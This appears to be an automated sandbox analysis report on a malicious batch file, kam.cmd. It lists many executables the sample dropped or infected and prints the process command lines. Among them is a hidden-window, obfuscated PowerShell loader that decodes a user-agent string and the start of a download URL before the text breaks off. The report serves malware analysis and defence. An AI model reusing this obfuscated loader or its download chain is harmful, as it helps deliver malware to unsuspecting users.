Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
kam.cmd
|
ASCII text, with very long lines (6481), with no line terminators
|
initial sample
|
 |
|
|
C:\Program Files (x86)\AutoIt3\Au3Check.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Au3Info.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\AutoIt3\Uninstall.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\chrome.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Windows\svchost.com
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\3582-490\wab.exe
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2hfgt3v.m5b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cefbqc1w.cfa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzebyc0y.xwg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtlcv520.z1o.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp5023.tmp
|
Non-ISO extended-ASCII text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\Bridgewards.Hal
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QZRM74J2NJ307FGYH2DZ.temp
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 155 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function
Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178
-lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function
Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI
ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0
ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a.
Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr
CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick
eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons
